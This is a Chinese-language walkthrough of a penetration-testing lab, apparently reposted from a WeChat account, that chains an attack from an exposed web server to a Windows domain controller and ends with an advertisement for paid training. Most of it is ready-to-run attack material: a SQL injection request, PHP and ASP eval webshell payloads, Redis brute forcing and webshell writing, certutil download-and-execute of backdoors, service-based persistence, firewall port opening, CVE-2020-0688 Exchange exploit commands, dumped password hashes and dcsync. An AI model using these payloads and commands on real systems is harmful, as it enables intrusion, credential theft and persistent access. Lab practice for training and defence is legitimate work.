【项目十一】从外网打点到内网域实战cncat

  • A+
所属分类:安全文章






暗月实战项目十一




从外网打点到内网域实战cncat
【项目十一】从外网打点到内网域实战cncat

moonsec


1. 概述 1

2. 靶场搭建 2

3. 外网打点 5

3.1. SQLMAP注入得到账号和密码 5

3.2. 修改配置文件拿webshell 6

3.3. 提权宝塔系统 6

3.4. frp反向代理突破登录 9

4. 内网渗透 10

4.1. 主机信息收集 11

4.2. 横向渗透 11

4.3. 跨网段扫描 12

4.4. hydra爆破redis 12

4.5. redis windowsshell 12

4.6. answrod连接shell 13

4.7. 信息收集redis 服务器信息 14

4.8. PrintSpoofer提权server2012 15

4.9. 下载metasploist正向后门收集信息 15

4.10. 设置服务方式启动后门 15

4.11. 设置windwos防火墙开放8899端口 15

4.12. metasploit正向连接后门 16

4.13. outlook查看邮件 18

5. 跨网段内网渗透 18

5.1. CVE-2020-0688 攻击exchange 20

5.2. 获取dc下的root 21

5.3. 通过smbexec登录域控 22


1概述

暗月实战项目十一是从外网打点到内网再到域控,是三层网络,目标是反向代理到内网访问,通过这个WEB点的信息获取源码,再到审计突破,再到内网。到了内网通过横向移动发现更多主机,通过信息整理得到工作组边界设备的权限,再通过exchange漏洞获取核心区域访问权限,再拿下域控权限。

【项目十一】从外网打点到内网域实战cncat

主要技术应用:

基础的php代码审计、win系统的宝塔系统提权、cs或者msf实战渗透环境(vps一台)、shellcode免杀过火绒、内网漫游、三层网络、redis windows shell

windwos防火墙配置(主要是会开端口和端口转发)、代理隧道应用,exchange漏洞命令执行,打域控技巧。


2靶场搭建


【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat

12server-bt12server-redisnat模式。

外网准备一台vps系统可以是win也可以是linux要装有frp服务

12server-bt配置frp

【项目十一】从外网打点到内网域实战cncat

[common]

server_addr= 你的vpsIP

server_port= 7788

token=moonsec9999

[web]

type= tcp

local_ip= 127.0.0.1

local_port= 80

remote_port= 80

绑定hosts

C:WindowsSystem32driversetchosts

你的vps www.cocat.cc

【项目十一】从外网打点到内网域实战cncat

3外网打点


3.1 SQLMAP注入得到账号和密码

POST/kss_inc/payapi_return2.php HTTP/1.1Host:www.cocat.ccUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101Firefox/88.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateConnection:closeCookie:ZDEDebuggerPresent=php,phtml,php3; loginimg=A1IIHQlPVwU%3D;loginimg_ver=1c6e1ea86bf5d4fa16f40d540fc3de9eUpgrade-Insecure-Requests:1Cache-Control:max-age=0Content-Type:application/x-www-form-urlencodedContent-Length:94


v_oid=K60722174137712560Dh4iW1&v_pstatus=20&v_amount=1&v_moneytype=1&remark1=1&v_md5str=121212sqlmap-r sql.txt --dbms mysql -v 1 -p v_oid --dump -C "username,password"-D www_cocat_cc -T kss_tb_manager


【项目十一】从外网打点到内网域实战cncat

破解得[email protected]

3.2 修改配置文件拿webshell


moo');eval($_POST[cmd]);//

【项目十一】从外网打点到内网域实战cncat


3.3 提权宝塔系统

禁用函数

passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,putenv,exec  



查看配置文件获取密码

【项目十一】从外网打点到内网域实战cncat

宝塔的登录密码C:/BtSoft/panel/data/default.pl jSKyFFdj

宝塔的登录端口C:/BtSoft/panel/data/port.pl8888

宝塔的登录网址路径C:/BtSoft/panel/data/admin_path.pl/e1VOsmtO


【项目十一】从外网打点到内网域实战cncat

C:/BtSoft/panel/data/default.db

【项目十一】从外网打点到内网域实战cncat


sqlite数据库打开即可

【项目十一】从外网打点到内网域实战cncat

账号gOXZQjWA密码jSKyFFdj登录http://localhost:8888/e1VOsmtO


扫描端口

nmap -sT -A 154.194.2.139


【项目十一】从外网打点到内网域实战cncat

只开放了2280端口



查看本地开放端口

【项目十一】从外网打点到内网域实战cncat


访问8888端口


<?phpecho file_get_contents('http://localhost:8888/e1VOsmtO/')?>


【项目十一】从外网打点到内网域实战cncat

能访问登录页面但是登录不了。


3.4 frp反向代理突破登录

当前站点是反向代理出去的,所以可以考虑能不能修改配置文件。

[8080]type= tcplocal_ip= 127.0.0.1local_port= 8888remote_port= 8888



【项目十一】从外网打点到内网域实战cncat

可以看到文件是能修改,所以当管理重新执行的时候,就能通过8888端口访问宝塔的系统的8888端口。

登录宝塔系统

【项目十一】从外网打点到内网域实战cncat


这个后门还要过火绒的。随便找了以前那些资源生成了一个后门。然后在宝塔任务执行。

【项目十一】从外网打点到内网域实战cncat


【项目十一】从外网打点到内网域实战cncat


4内网渗透

4.1主机信息收集

hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:de935c6087ec367d3ef786915a4edcce:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::mysql:1002:aad3b435b51404eeaad3b435b51404ee:291376866817cf2ccfe198308e5f925b:::www:1001:aad3b435b51404eeaad3b435b51404ee:894f353e870620b186a9a46ce56ac8f1:::



loadmimikatzloadkiwimsv
IP 192.168.59.133


4.2 横向渗透

run post/windows/gather/arp_scanner rhosts=192.168.59.0/24


【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat


4.3 跨网段扫描

session执行绑定静态路由

run autoroute -s 192.168.59.0/24backgrounduse auxiliary/server/socks4arun


修改配置文件vi/etc/proxychains.conf

添加socks4 127.0.0.1 1080

代理nmap扫描

proxychains nmap -sT -Pn 192.168.59.4 -p80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389



【项目十一】从外网打点到内网域实战cncat

4.4 hydra爆破redis

proxychainshydra -P /home/kali/cncat/top100_cn.txt redis://192.168.59.4 -t 1 -ossh.txt -v

【项目十一】从外网打点到内网域实战cncat

4.5 redis windows写shell

proxychains redis-cli -h 192.168.59.4auth123456789qqconfig set dir C:/inetpub/wwwrootsetxxx "nnn<%eval request("cmd")%>nnn"config set dbfilename shell.aspsavequit

【项目十一】从外网打点到内网域实战cncat

访问shell

4.6 answrod连接shell

修改proxychanis.conf连接

【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat

4.7 信息收集redis服务器信息

【项目十一】从外网打点到内网域实战cncat

发现存在两个段

【项目十一】从外网打点到内网域实战cncat

当前权限也是很低

4.8 PrintSpoofer提权server2012

PrintSpoofer上传到C:ProgramData

C:ProgramDatamoonsec.exe-i -c "whoami"

【项目十一】从外网打点到内网域实战cncat

4.9 下载metasploist正向后门收集信息

因为reids主机是出不了网的所以要将后门放在宝塔上的80端口,同样也要过火绒。

certutil -urlcache -split -f http://192.168.59.133/8899.exe 8899.exe

【项目十一】从外网打点到内网域实战cncat

4.10 设置服务方式启动后门

注意双引号转义

moonsec.exe -i -c  "sc create "server power" binpath="C:ProgramData8899.exe""moonsec.exe -i -c  "sc description "server power""description""moonsec.exe -i -c  "sc config "server power" start= auto"


启动后门

moonsec.exe -i -c  "net start  "server power""

4.11 设置windwos防火墙开放8899端口

因为有防火墙拦截先添加一个8899端口

netshfirewall add portopening tcp 8899 msf

【项目十一】从外网打点到内网域实战cncat


4.12 metasploit正向连接后门

use exploit/multi/handlersetp ayload windows/meterpreter/bind_tcpsetR HOST 192.168.59.4setl port 8899exploit

启动后门

moonsec.exe -i -c "net start "server power""

【项目十一】从外网打点到内网域实战cncat

这里有一个bug连上之后个几分钟就自动退出了。所以连接后马上迁移进程防止失去连接。


【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat



【项目十一】从外网打点到内网域实战cncat

扫描10段的主机发现存在201209

4.13 outlook查看邮件

导出outlook文件C:UsersAdministratorDocumentsOutlook文件


【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat


outlook获取信息moonsec的密码是QQqq5201314


5跨网段内网渗透

添加路由

run autoroute -s 10.10.10.0/24proxychains nmap -sT 10.10.10.209 -p80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389

【项目十一】从外网打点到内网域实战cncat

访问443端口是一个exchange

【项目十一】从外网打点到内网域实战cncat

域控应该是cncatmoonsecQQqq5201314

【项目十一】从外网打点到内网域实战cncat

登录成功。

【项目十一】从外网打点到内网域实战cncat

查看所有用户。

5.1 CVE-2020-0688 攻击exchange

下载后门文件到exchange

CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncatmoonsec -p QQqq5201314 -c "cmd/c certutil -urlcache -split -f http://10.10.10.202/4444.exec:/4444.exe"

【项目十一】从外网打点到内网域实战cncat

CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncatmoonsec -p QQqq5201314 -c "cmd/c netsh firewall add portopening tcp 8899 msf"CVE-2020-0688_EXP.py -s https://10.10.10.209 -u cncatmoonsec -p QQqq5201314 -c "cmd/c c:/4444.exe"

【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat

5.2 获取dc下的root

type \10.10.10.201c$usersadministratorroot.txt

【项目十一】从外网打点到内网域实战cncat

dcsync administrator 获取hash

【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat

知道了密码就可以通过代理对域控进行命令执行了。这里有空再说了。


5.3 通过smbexec登录域控

proxychains python3 smbexec.py cncat/administrator:[email protected]10.10.10.201

【项目十一】从外网打点到内网域实战cncat

6培训


 项目十一 cncat

已经录制好课程有配套的工具

欢迎加入暗月全栈渗透培训观看和学习

培训咨询微信

扫一扫添加好友

【项目十一】从外网打点到内网域实战cncat

微信公众号

【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat

【项目十一】从外网打点到内网域实战cncat






本文始发于微信公众号(阿乐你好):【项目十一】从外网打点到内网域实战cncat

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: